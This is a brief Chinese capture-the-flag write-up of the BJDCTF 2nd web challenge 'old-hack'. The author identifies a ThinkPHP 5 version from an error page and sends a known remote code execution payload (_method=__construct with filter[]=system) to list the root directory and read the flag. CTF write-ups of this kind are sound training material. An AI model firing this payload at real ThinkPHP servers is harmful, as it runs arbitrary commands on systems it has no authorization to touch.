[BJDCTF 2nd] web题-old-hack

复现环境:buuoj.cn

[BJDCTF 2nd] web题-old-hack_第1张图片
发现是thinkphp5,让页面报错找到了具体的版本号。
[BJDCTF 2nd] web题-old-hack_第2张图片
上网找了这个漏洞的payload

POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

使用hackbar的post传递这个参数进去,查看根目录下的文件

[BJDCTF 2nd] web题-old-hack_第3张图片
读取flag
[BJDCTF 2nd] web题-old-hack_第4张图片flag{dc909607-e27c-40a9-86e8-2de6079ed503}

你可能感兴趣的:(CTF练习)